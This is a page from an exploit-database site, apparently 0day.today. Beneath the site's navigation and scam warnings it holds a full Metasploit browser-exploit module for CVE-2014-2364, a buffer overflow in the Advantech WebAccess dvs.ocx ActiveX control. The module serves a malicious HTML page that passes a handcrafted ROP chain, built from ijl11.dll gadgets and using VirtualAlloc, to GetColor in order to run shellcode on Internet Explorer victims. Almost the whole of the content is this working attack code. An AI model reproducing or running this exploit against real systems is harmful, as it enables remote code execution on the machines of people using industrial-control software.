0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Advantech WebAccess dvs.ocx GetColor Buffer Overflow Exploit
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8 and IE 9. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], 'DefaultOptions' => { 'Retries' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => /MSIE/i, :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", :method => "GetColor" }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x5c", # Patch the stack to execute the decoder... 'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 # Fix the stack again, this time better :), before the payload # is executed. 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) print_status("Requested: #{request.uri}") content = <<-EOS <html> <head> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> </head> <body> <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object> <script language='javascript'> test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0); </script> </body> </html> EOS print_status("Sending #{self.name}") send_response_html(cli, content, {'Pragma' => 'no-cache'}) end # Uses gadgets from ijl11.dll 1.1.2.16 def rop_payload(code) xpl = rand_text_alphanumeric(61) # offset xpl << [0x60014185].pack("V") # RET xpl << rand_text_alphanumeric(8) # EBX = dwSize (0x40) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdafc9].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 xpl << [0x60018084].pack("V") # POP EBP # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret # EDX = flAllocationType (0x1000) xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x9ffdbf89].pack("V") # eax value xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << rand_text_alphanumeric(4) # padding xpl << [0x60029f6c].pack("V") # .data ijl11.dll xpl << [0x60012288].pack("V") # POP ECX # RETN xpl << [0xffffffff].pack("V") # ecx value 0x41.times do xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN end # EAX = ptr to &VirtualAlloc() xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] # EBP = POP (skip 4 bytes) xpl << [0x6002054b].pack("V") # POP EBP # RETN xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) # ESI = ptr to JMP [EAX] xpl << [0x600181cc].pack("V") # POP ESI # RETN xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) # EDI = ROP NOP (RETN) xpl << [0x60021ad1].pack("V") # POP EDI # RETN xpl << [0x60021ad2].pack("V") # ptr to &(retn) # ESP = lpAddress (automatic) # PUSHAD # RETN xpl << [0x60018399].pack("V") # PUSHAD # RETN xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) xpl << code xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping xpl end end # 0day.today [2024-12-25] #